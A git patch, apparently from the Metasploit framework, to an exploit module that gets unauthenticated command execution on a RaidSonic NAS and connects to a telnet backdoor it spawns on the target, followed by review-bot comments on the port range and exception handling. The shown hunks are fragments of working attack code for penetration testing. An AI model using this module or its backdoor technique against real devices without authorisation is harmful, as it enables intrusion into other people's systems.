From 926ddf35bc2b1505fa430edd98a454827ce4318f Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 19 Sep 2013 08:23:25 -0500
Subject: [PATCH] Fix possible collisions on binding port and handle rex socket
---
 .../linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
index 19f35eedde..ea03679036 100644
--- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
+++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def exploit
- telnet_port = rand(65535)
+ telnet_port = rand(32767) + 32768
 print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}")
@@ -124,12 +124,15 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
- sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i })
+ ctx = { 'Msf' => framework, 'MsfExploit' => self }
+ sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx })
 if sock.nil?
 fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 end
+ add_socket(sock)
+ print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
 prompt = negotiate_telnet(sock)
 if prompt.nil?
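Review bot: The constants in `telnet_port = rand(32767) + 32768` are unexplained, and the expression yields 32768..65534, so 65535 is never selected. A one-line comment above the assignment would record the intent, for example `# random high port (32768..65534); low ports are more likely to be in use already`, which is presumably what the commit subject means by collisions. If the project's minimum Ruby version allows it, `rand(32768..65535)` states the range directly. The body of `exploit` continues outside the hunk.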
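Review bot: The `if sock.nil?` guard that follows `Rex::Socket.create_tcp` probably never fires, because as far as I know that call reports a refused or timed-out connection by raising a `Rex::ConnectionError` subclass rather than returning nil. If that is right, the "Backdoor service has not been spawned" message is never shown and the exception leaves `exploit` unless a rescue outside this hunk catches it. Adding `rescue ::Rex::ConnectionError` around the call and routing it to the same `fail_with` would keep the failure path the code already intends. `exploit` starts and ends outside the hunk, so an enclosing rescue cannot be ruled out from here.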